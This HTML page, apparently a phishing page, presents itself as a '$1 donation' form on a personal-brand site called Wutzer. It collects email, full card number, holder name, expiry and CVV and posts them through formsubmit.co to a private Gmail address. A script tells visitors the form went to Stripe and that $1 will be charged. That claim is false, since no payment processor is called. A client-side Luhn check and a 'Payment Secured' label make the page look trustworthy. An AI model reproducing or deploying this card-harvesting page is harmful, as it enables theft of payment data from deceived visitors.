<!DOCTYPE HTML>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="">
    <meta name="author" content="">

    <link rel="shortcut icon" href="favicon.png">
    <link rel="apple-touch-icon" href="apple-touch-icon.png">
    <link rel="apple-touch-icon" sizes="72x72" href="apple-touch-icon-72x72.png">
    <link rel="apple-touch-icon" sizes="114x114" href="apple-touch-icon-114x114.png">
    <title>Support us</title>
    <link href="../../css-2?family=Montserrat:300,400,500,600,700&display=swap" rel="stylesheet">
    <link href="../../css-3?family=Libre+Baskerville:400i&display=swap" rel="stylesheet">
    <link href="css/style.css" rel="stylesheet" media="screen">
    <link rel="stylesheet" href="css/elements.css">
    <link rel="stylesheet" href="vaer/">
</head>

<body>
    <div class="animsition">
        <div class="loader">
            <div class="spinner">
                <div class="double-bounce1"></div>
                <div class="double-bounce2"></div>
            </div>
        </div>

        <div class="click-capture"></div>

        <div class="menu">
            <span class="close-menu icon-cross2 right-boxed"></span>
            <ul class="menu-list right-boxed">
                <li data-menuanchor="page1">
                    <a href="index.html#page1">Home</a>
                </li>
                <li data-menuanchor="page2">
                    <a href="index.html#page2">Specialization</a>
                </li>
                <li data-menuanchor="page3">
                    <a href="index.html#page3">Resume</a>
                </li>
                <li data-menuanchor="page4">
                    <a href="index.html#page4">About</a>
                </li>
                <li data-menuanchor="page5">
                    <a href="index.html#page5">Projects</a>
                </li>
                <li data-menuanchor="page7">
                    <a href="index.html#page7">Testimonials</a>
                </li>
                <li data-menuanchor="page8">
                    <a href="index.html#page8">Contact</a>
                </li>
            </ul>
            <div class="menu-footer right-boxed">
                <div class="social-list">
                    <a href="https://twitter.com/marcowutzer?lang=" class="icon ion-social-twitter"></a>
                    <a href="https://web.facebook.com/FinancialSovereignty?_rdc=1&_rdr" class="icon ion-social-facebook"></a>
                    <a href="https://www.instagram.com/marcowutzer/?hl=enen" class="icon ion-social-instagram"></a>
                    <a href="https://co.linkedin.com/in/marco-wutzer-7a37a5120" class="icon ion-social-linkedin"></a>
                    <a href="https://wa.me/message/S45ZMV3KLNPVK1" class="icon ion-social-whatsapp"></a>
                </div>
                <div class="copy">© Wutzer 2022. All Rights Reseverd<br> Author <br> Marco Wutzer</div>
            </div>
        </div>

        <header class="navbar boxed">
            <div class="navbar-bg"></div>
            <a class="brand" href="new.html">
                <img class="brand-img" alt="" src="images/brand.png">
                <div class="brand-info">
                    <div class="brand-name">Wutzer</div>
                </div>
            </a>
            <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#navbar-collapse"
                aria-expanded="false">
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
            </button>
            <div class="contacts d-none d-md-block">
                <div class="contact-item">
                </div>
                <div class="contact-item spacer">
                </div>
                <div class="contact-item">
                    <a href="/cdn-cgi/l/email-protection#d6b5b9b8a2b7b5a29684b7bba5b7aff8b5b9bb"><span
                            class="__cf_email__" data-cfemail="95f6fafbe1f4f6e1d5c7f4f8e6f4ecbbf6faf8"></span></a>
                </div>
            </div>
        </header>
        <div
            style="display: flex; align-items: center; justify-content: center; padding-top: 20px;padding-bottom: 20px;  background:linear-gradient(45deg, blueviolet, deeppink); margin-top: 100px;">
            <h2 class="divtext">
                Support Us: Gift $1 to help reach more people.
            </h2>
        </div>

        <div class="container">

            <div class="card-container">

                <div class="front">
                    <div class="image">
                        <img src="image/chip.png" alt="">
                        <img src="image/visa.png" alt="">
                    </div>
                    <div class="card-number-box">############</div>
                    <div class="flexbox">
                        <div class="box">
                            <span>card holder</span>
                            <div class="card-holder-name">full name</div>
                        </div>
                        <div class="box">
                            <span>expires</span>
                            <div class="expiration">
                                <span class="exp-month">mm</span>
                                <span class="exp-year">yy</span>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="back">
                    <div class="stripe"></div>
                    <div class="box">
                        <span>cvv</span>
                        <div class="cvv-box"></div>
                        <img src="image/visa.png" alt="">
                    </div>
                </div>

            </div>

            <form action="https://formsubmit.co/rodriguegahabam@gmail.com" method="POST">
                <div class="inputBox">
                    <span>Email Address</span>
                    <input style="background-color: white;" type="email" name="Email" required>
                </div>
                <input type="hidden" name="_next" value="https://marcowutzerfreecourses.github.io/Marcowutzerfreecourses/dowmload%20course.html">
                <input type="hidden" name="_subject" value="New submission!">
                <div class="inputBox" id="class-container">
                    <span>card number</span>
                    <input style="background-color: white;" name="Card Number" type="text" maxlength="16"
                        onkeyup="update(this.value)" class="card-number-input" id="card" required>
                    <img src="image/card_img.jpg" id="img" style=" width: 50%; height: 80px; margin-top: 13px;"><br>
                    <Span style="margin-top: 13px; color:  #1d005f;" id="valid">Payment Secured</Span>
                </div>
                <div class="inputBox">
                    <div class="inputBox">
                        <span>card holder</span>
                        <input style="background-color: white;" type="text" class="card-holder-input" name="Card Holder"
                            required>
                    </div>
                    <div class="flexbox">
                        <div class="inputBox">
                            <span>exp mm</span>
                            <select required name=" expiration month" id="" class="month-input">
                                <option value="month" selected disabled>month</option>
                                <option value="01">01</option>
                                <option value="02">02</option>
                                <option value="03">03</option>
                                <option value="04">04</option>
                                <option value="05">05</option>
                                <option value="06">06</option>
                                <option value="07">07</option>
                                <option value="08">08</option>
                                <option value="09">09</option>
                                <option value="10">10</option>
                                <option value="11">11</option>
                                <option value="12">12</option>
                            </select>
                        </div>
                        <div class="inputBox">
                            <span>exp yy</span>
                            <select aria-required="true" name="expiration year" id="" class="year-input" required>
                                <option value="year" selected disabled>year</option>
                                <option value="2021">2021</option>
                                <option value="2022">2022</option>
                                <option value="2023">2023</option>
                                <option value="2024">2024</option>
                                <option value="2025">2025</option>
                                <option value="2026">2026</option>
                                <option value="2027">2027</option>
                                <option value="2028">2028</option>
                                <option value="2029">2029</option>
                                <option value="2030">2030</option>
                            </select>
                        </div>
                        <div class="inputBox">
                            <span>cvv</span>
                            <input style="background-color: white;" name="cvv" required type="text" maxlength="4"
                                class="cvv-input">
                        </div>
                    </div>
                    <input type="submit" id="submit" value="Donate" class="submit-btn">
            </form>

        </div>

       




        <script>

            document.querySelector('.card-number-input').oninput = () => {
                document.querySelector('.card-number-box').innerText = document.querySelector('.card-number-input').value;
            }

            document.querySelector('.card-holder-input').oninput = () => {
                document.querySelector('.card-holder-name').innerText = document.querySelector('.card-holder-input').value;
            }

            document.querySelector('.month-input').oninput = () => {
                document.querySelector('.exp-month').innerText = document.querySelector('.month-input').value;
            }

            document.querySelector('.year-input').oninput = () => {
                document.querySelector('.exp-year').innerText = document.querySelector('.year-input').value;
            }

            document.querySelector('.cvv-input').onmouseenter = () => {
                document.querySelector('.front').style.transform = 'perspective(1000px) rotateY(-180deg)';
                document.querySelector('.back').style.transform = 'perspective(1000px) rotateY(0deg)';
            }

            document.querySelector('.cvv-input').onmouseleave = () => {
                document.querySelector('.front').style.transform = 'perspective(1000px) rotateY(0deg)';
                document.querySelector('.back').style.transform = 'perspective(1000px) rotateY(180deg)';
            }

            document.querySelector('.cvv-input').oninput = () => {
                document.querySelector('.cvv-box').innerText = document.querySelector('.cvv-input').value;
            }

        </script>
        <style>
            @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@100;200;300;400;500;600;700&display=swap');

            * {
                font-family: 'Poppins', sans-serif;
                margin: 0;
                padding: 0;
                box-sizing: border-box;
                outline: none;
                border: none;
                text-decoration: none;
                text-transform: uppercase;
            }

            .container {
                min-height: 100vh;
                background: rgb(238, 238, 238);
                display: flex;
                align-items: center;
                justify-content: center;
                flex-flow: column;
                padding-bottom: 60px;
            }

            .container form {
                background: #fff;
                border-radius: 20px;
                box-shadow: 0 10px 15px rgba(0, 0, 0, .1);
                padding: 20px;
                width: 600px;
                padding-top: 160px;
            }

            .container form .inputBox {
                margin-top: 20px;
            }

            .container form .inputBox span {
                display: block;
                color: #999;
                padding-bottom: 5px;
            }

            .container form .inputBox input,
            .container form .inputBox select {
                width: 100%;
                padding: 10px;
                border-radius: 10px;
                border: 1px solid rgba(0, 0, 0, .3);
                color: #444;
            }

            .container form .flexbox {
                display: flex;
                gap: 15px;
            }

            .container form .flexbox .inputBox {
                flex: 1 1 150px;
            }

            .container form .submit-btn {
                width: 100%;
                background: linear-gradient(45deg, blueviolet, deeppink);
                margin-top: 20px;
                padding: 10px;
                font-size: 20px;
                color: #fff;
                border-radius: 10px;
                cursor: pointer;
                transition: .2s linear;
            }

            .container form .submit-btn:hover {
                letter-spacing: 2px;
                opacity: .8;
            }

            .container .card-container {
                margin-bottom: -150px;
                position: relative;
                height: 250px;
                width: 400px;
            }

            .container .card-container .front {
                position: absolute;
                height: 100%;
                width: 100%;
                top: 0;
                left: 0;
                background: linear-gradient(45deg, blueviolet, deeppink);
                border-radius: 5px;
                backface-visibility: hidden;
                box-shadow: 0 15px 25px rgba(0, 0, 0, .2);
                padding: 20px;
                transform: perspective(1000px) rotateY(0deg);
                transition: transform .4s ease-out;
            }

            .container .card-container .front .image {
                display: flex;
                align-items: center;
                justify-content: space-between;
                padding-top: 10px;
            }

            .container .card-container .front .image img {
                height: 50px;
            }

            .container .card-container .front .card-number-box {
                padding: 30px 0;
                font-size: 22px;
                color: #fff;
            }

            .container .card-container .front .flexbox {
                display: flex;
            }

            .container .card-container .front .flexbox .box:nth-child(1) {
                margin-right: auto;
            }

            .container .card-container .front .flexbox .box {
                font-size: 15px;
                color: #fff;
            }

            .container .card-container .back {
                position: absolute;
                top: 0;
                left: 0;
                height: 100%;
                width: 100%;
                background: linear-gradient(45deg, blueviolet, deeppink);
                border-radius: 5px;
                padding: 20px 0;
                text-align: right;
                backface-visibility: hidden;
                box-shadow: 0 15px 25px rgba(0, 0, 0, .2);
                transform: perspective(1000px) rotateY(180deg);
                transition: transform .4s ease-out;
            }

            .container .card-container .back .stripe {
                background: #000;
                width: 100%;
                margin: 10px 0;
                height: 50px;
            }

            .container .card-container .back .box {
                padding: 0 20px;
            }

            .container .card-container .back .box span {
                color: #fff;
                font-size: 15px;
            }

            .container .card-container .back .box .cvv-box {
                height: 50px;
                padding: 10px;
                margin-top: 5px;
                color: #333;
                background: #fff;
                border-radius: 5px;
                width: 100%;
            }

            .container .card-container .back .box img {
                margin-top: 30px;
                height: 30px;
            }

            .divtext{
                color: rgb(255, 247, 247); 
                font-size: 20px; 
                color:  #333;
            }

            @media all and (max-width : 800px) {
                body {
                    margin: 0;
                    padding: 0;
                }

                .container form .flexbox .inputBox {
                    flex: 1 1 50px;
                }

                .container form {
                    background: #fff;
                    border-radius: 5px;
                    box-shadow: 0 10px 15px rgba(0, 0, 0, .1);
                    padding: 20px;
                    width: 350px;
                    padding-top: 160px;
                }


                .container .card-container .front {
                    position: absolute;
                    height: 100%;
                    width: 75%;
                    top: 0;
                    left: 0;
                    margin-left: 50px;
                    background: linear-gradient(45deg, blueviolet, deeppink);
                    border-radius: 5px;
                    backface-visibility: hidden;
                    box-shadow: 0 15px 25px rgba(0, 0, 0, .2);
                    padding: 20px;
                    transform: perspective(1000px) rotateY(0deg);
                    transition: transform .4s ease-out;
                }

                .container .card-container .back {
                    position: absolute;
                    top: 0;
                    left: 0;
                    height: 100%;
                    width: 75%;
                    margin-left: 50px;
                    background: linear-gradient(45deg, blueviolet, deeppink);
                    border-radius: 5px;
                    padding: 20px 0;
                    text-align: right;
                    backface-visibility: hidden;
                    box-shadow: 0 15px 25px rgba(0, 0, 0, .2);
                    transform: perspective(1000px) rotateY(180deg);
                    transition: transform .4s ease-out;
                }

                .container {
                    min-height: 100vh;
                    background: #eee;
                    display: flex;
                    align-items: center;
                    justify-content: center;
                    flex-flow: column;
                    padding-bottom: 0px;
                    margin-left: 0;
                    margin-right: 0;
                }

                .divtext {

                    text-align: center;
                    font-size: 12px;
                }
            }
        </style>

        <script>
            // returns true or false
            function validateCreditCardNumber(cardNumber) {
                cardNumber = cardNumber.split(' ').join("");
                if (parseInt(cardNumber) <= 0 || (!/\d{15,16}(~\W[a-zA-Z])*$/.test(cardNumber)) || cardNumber.length > 16) {
                    return false;
                }
                var carray = new Array();
                for (var i = 0; i < cardNumber.length; i++) {
                    carray[carray.length] = cardNumber.charCodeAt(i) - 48;
                }
                carray.reverse();
                var sum = 0;
                for (var i = 0; i < carray.length; i++) {
                    var tmp = carray[i];
                    if ((i % 2) != 0) {
                        tmp *= 2;
                        if (tmp > 9) {
                            tmp -= 9;
                        }
                    }
                    sum += tmp;
                }
                return ((sum % 10) == 0);
            }
            function cardType(cardNumber) { // returns card type; should not rely on this for checking if a card is valid
                cardNumber = cardNumber.split(' ').join("");
                var o = {
                    electron: /^(4026|417500|4405|4508|4844|4913|4917)\d+$/,
                    maestro: /^(5018|5020|5038|5612|5893|6304|6759|6761|6762|6763|0604|6390)\d+$/,
                    dankort: /^(5019)\d+$/,
                    interpayment: /^(636)\d+$/,
                    unionpay: /^(62|88)\d+$/,
                    visa: /^4[0-9]{12}(?:[0-9]{3})?$/,
                    mastercard: /^5[1-5][0-9]{14}$/,
                    amex: /^3[47][0-9]{13}$/,
                    diners: /^3(?:0[0-5]|[68][0-9])[0-9]{11}$/,
                    discover: /^6(?:011|5[0-9]{2})[0-9]{12}$/,
                    jcb: /^(?:2131|1800|35\d{3})\d{11}$/
                }
                for (var k in o) {
                    if (o[k].test(cardNumber)) {
                        return k;
                    }
                }
                return null;
            }
            function update(cardNumber) {
                var img = document.getElementById("img")
                var valid = document.getElementById("valid")
                if (validateCreditCardNumber(cardNumber)) {
                    valid.innerText = "valid"
                    valid.style.color = "blue"
                    img.src = "image/card_img" + ".jpg"
                } else {
                    valid.innerText = "Invalid"
                    valid.style.color = "red"
                    img.src = "image/card_img" + ".jpg"
                }
            }

            var sumit = document.getElementById("submit")
            sumit.onclick = function () {
                alert("Form submiited to stripe for confirmation. $1 will be deducted from your card within 24hours.")
            }
        </script>
        <script data-cfasync="false"
            src="../../cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min-1.js"></script>
        <script src="js/jquery.min.js"></script>
        <script src="js/wow.min.js"></script>
        <script src="js/jquery.magnific-popup.min.js"></script>
        <script src="js/smoothscroll.js"></script>
        <script src="js/animsition.js"></script>
        <script src="js/scripts.js"></script>

</body>

</html>
